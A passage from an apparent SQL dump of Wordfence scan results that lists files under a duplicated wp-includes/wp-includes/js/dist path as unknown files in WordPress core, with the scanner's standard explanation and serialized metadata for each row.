wp-includes/wp-includes/js/dist/shortcode.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/js/dist/shortcode.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77606,1675048839,1675048839,'new','knownfile',75,'acf888dd1af6ab0c5a169068757ca2b0','f3b65b7e1801b90f9a7f190354d9d932','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/token-list.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:45:\"wp-includes/wp-includes/js/dist/token-list.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77607,1675048839,1675048839,'new','knownfile',75,'88df3943b02c89fd653d6c721d1ae0b6','f625b99eee97c438585285297a02adef','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/token-list.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/js/dist/token-list.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77608,1675048839,1675048839,'new','knownfile',75,'98c24d7543e1a6ee5fbcec58a3b314af','0a5631e8ddaeda277829e806856f60fc','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/url.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:38:\"wp-includes/wp-includes/js/dist/url.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77609,1675048839,1675048839,'new','knownfile',75,'820dd9beb3ade887ca3632ad0afe21ab','c1b43dc2cba8be83c4f9d88a3def065a','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/url.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:42:\"wp-includes/wp-includes/js/dist/url.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77610,1675048839,1675048839,'new','knownfile',75,'accb24144ca9068ce008f7c20458558f','5c87f772944e9997641d4aefe546fdb3','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/vendor/lodash.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/js/dist/vendor/lodash.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77611,1675048839,1675048839,'new','knownfile',75,'3437a64dcdf88439b21296ff019111da','6bc072562cf150eda67392d612f84985','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/vendor/lodash.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:52:\"wp-includes/wp-includes/js/dist/vendor/lodash.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77612,1675048839,1675048839,'new','knownfile',75,'20487756a201d5438a330743f826e279','d0e0f19b845a624aaaeecc424e2d07c7','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/vendor/moment.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/js/dist/vendor/moment.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77613,1675048839,1675048839,'new','knownfile',75,'ae0b66eceda86ae1c4f123515be60eba','dd818dc1dc7c833ccbb6e1e582e2bbc8','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/vendor/moment.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:52:\"wp-includes/wp-includes/js/dist/vendor/moment.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77614,1675048839,1675048839,'new','knownfile',75,'c795c83d80c02209538c17cf6e4efdbe','ab3d66996cd5cc09f6eff2f1a7ade0ce','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/vendor/react-dom.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:51:\"wp-includes/wp-includes/js/dist/vendor/react-dom.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77615,1675048839,1675048839,'new','knownfile',75,'e1ec2c4fd9880a75b8ae1a47d14f2a53','18acaf138e7ae72aa21f33d1770e5a90','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/vendor/react-dom.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/js/dist/vendor/react-dom.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77616,1675048839,1675048839,'new','knownfile',75,'7c122a3127454d01bd43fc8fcacbf196','1eb163254fea1bdf3d10a603ce9a4455','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/vendor/react.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/js/dist/vendor/react.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77617,1675048839,1675048839,'new','knownfile',75,'c01701771d708a6b2a0e4e3d2221a607','79fa60886102f4766808b7cbb1110fba','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/vendor/react.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:51:\"wp-includes/wp-includes/js/dist/vendor/react.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77618,1675048839,1675048839,'new','knownfile',75,'439bfe2fb3fb4ce703d0a75cfa3ab009','15574dbe9793d52999a0f065d019e9ed','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/vendor/wp-polyfill-dom-rect.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:62:\"wp-includes/wp-includes/js/dist/vendor/wp-polyfill-dom-rect.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77619,1675048839,1675048839,'new','knownfile',75,'240361aba8d785cd2e733ebee7b86365','6e8588f4c41ef449694fd3ef9c1ab6c1','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/vendor/wp-polyfill-dom-rect.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:66:\"wp-includes/wp-includes/js/dist/vendor/wp-polyfill-dom-rect.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77620,1675048839,1675048839,'new','knownfile',75,'e86331218f2e0eb0c27dd754115fcef1','572d1a88d99f8d05509eee76464f884a','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/vendor/wp-polyfill-element-closest.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:69:\"wp-includes/wp-includes/js/dist/vendor/wp-polyfill-element-closest.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77621,1675048839,1675048839,'new','knownfile',75,'0b9734b7020af6b7c5c37495a819af31','326013c86c26dd51959fa4c9b562cd39','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/vendor/wp-polyfill-element-closest.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:73:\"wp-includes/wp-includes/js/dist/vendor/wp-polyfill-element-closest.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77622,1675048840,1675048840,'new','knownfile',75,'19af301438bf8181e415b5be5b47ce6c','b313735d26273b4ac939f613228a9f2d','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/vendor/wp-polyfill-fetch.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:59:\"wp-includes/wp-includes/js/dist/vendor/wp-polyfill-fetch.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77623,1675048840,1675048840,'new','knownfile',75,'aa0cc99e4a32712121847d87984b9c7d','207db7f8eae034768d6d2a3332812fbb','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/vendor/wp-polyfill-fetch.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:63:\"wp-includes/wp-includes/js/dist/vendor/wp-polyfill-fetch.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77624,1675048840,1675048840,'new','knownfile',75,'0c6d3252b50468cf84fe71a8817d0f0b','98737686196abea510bc9009f4ebae36','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/vendor/wp-polyfill-formdata.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:62:\"wp-includes/wp-includes/js/dist/vendor/wp-polyfill-formdata.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77625,1675048840,1675048840,'new','knownfile',75,'accf5244b2e052d324c30ad1bea4cc2c','827c92d74a8b0bb3b953501bcc8ba7ad','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/vendor/wp-polyfill-formdata.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:66:\"wp-includes/wp-includes/js/dist/vendor/wp-polyfill-formdata.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77626,1675048840,1675048840,'new','knownfile',75,'6eb4d8c8470471d85571ac91b2db6f41','919ec8df1d6b3cf7931a2be8046430c9','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/vendor/wp-polyfill-node-contains.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:67:\"wp-includes/wp-includes/js/dist/vendor/wp-polyfill-node-contains.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77627,1675048840,1675048840,'new','knownfile',75,'6295ed7580917ea55b0214d2c0a6ae12','fa77a18e54156e02c3a3709c84ba1fc6','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/vendor/wp-polyfill-node-contains.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:71:\"wp-includes/wp-includes/js/dist/vendor/wp-polyfill-node-contains.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77628,1675048840,1675048840,'new','knownfile',75,'35bfcdde5939c84bb93dabcdad6db9eb','956883e22228063c39401d2cc3cd4271','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/vendor/wp-polyfill-object-fit.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:64:\"wp-includes/wp-includes/js/dist/vendor/wp-polyfill-object-fit.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77629,1675048840,1675048840,'new','knownfile',75,'ade3782b301d1afc846b3f7fccdd3606','c5d09f367994dacd70d4d881dd525620','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/vendor/wp-polyfill-object-fit.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:68:\"wp-includes/wp-includes/js/dist/vendor/wp-polyfill-object-fit.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77630,1675048840,1675048840,'new','knownfile',75,'b72362e357ba1651749bc6ce8fd2c058','a11c30a72122275b47f79c376155be38','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/vendor/wp-polyfill-url.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:57:\"wp-includes/wp-includes/js/dist/vendor/wp-polyfill-url.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77631,1675048840,1675048840,'new','knownfile',75,'ca712d9510130e882387d41e0b09bfad','a5e17532337c547761711eada9cb364a','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/vendor/wp-polyfill-url.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:61:\"wp-includes/wp-includes/js/dist/vendor/wp-polyfill-url.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77632,1675048840,1675048840,'new','knownfile',75,'d00d1ce8864caa5e6a477a3463c69bc2','df9dca1fc8997f7e4eb8779f5ca64e97','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/vendor/wp-polyfill.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:53:\"wp-includes/wp-includes/js/dist/vendor/wp-polyfill.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77633,1675048840,1675048840,'new','knownfile',75,'5d7abc3732f18df376490235f7b4d059','c4d38a7a379b0a60c23dd7ac96e62348','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/vendor/wp-polyfill.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:57:\"wp-includes/wp-includes/js/dist/vendor/wp-polyfill.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77634,1675048840,1675048840,'new','knownfile',75,'fd776ab0277832588d5c82800369100b','aeae7150fe190f47d9da4b7a42a300b6','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/viewport.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:43:\"wp-includes/wp-includes/js/dist/viewport.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77635,1675048840,1675048840,'new','knownfile',75,'b015cb1b89bbe3ad5f3c68a03e3ef09c','bf580d5c1ea3488f298fa90c3d92778d','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/viewport.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/js/dist/viewport.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77636,1675048840,1675048840,'new','knownfile',75,'d4cc8aafb4972ea1ba29b3b962a84147','b90598f217b4bc258f35aec7118ed8d7','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/warning.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:42:\"wp-includes/wp-includes/js/dist/warning.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77637,1675048840,1675048840,'new','knownfile',75,'8c6ea8756002cf7013f68107eec29fd2','2d38a4f446ee761da3509cfddb14e2f2','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/warning.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/js/dist/warning.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77638,1675048840,1675048840,'new','knownfile',75,'556b3e7d00721eb84925ca79756efa27','d9e0505812758790f8447afadf539d7f','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/wordcount.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:44:\"wp-includes/wp-includes/js/dist/wordcount.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77639,1675048840,1675048840,'new','knownfile',75,'718aed7c91d6af633cf1046407388fbf','752958ed169a6574bb0c17ce305733bf','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/wordcount.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/js/dist/wordcount.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77640,1675048840,1675048840,'new','knownfile',75,'10b33da81b6161c9cfd18d7f49c6d2f1','cc886e95221e5739bbac59f6fbfb35ae','Unknown file in WordPress core: wp-includes/wp-includes/js/heartbeat.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:39:\"wp-includes/wp-includes/js/heartbeat.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77641,1675048841,1675048841,'new','knownfile',75,'3142ca578e37db5aa497dc02d12d0f20','404d27b2326821f662c8439307787061','Unknown file in WordPress core: wp-includes/wp-includes/js/heartbeat.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new 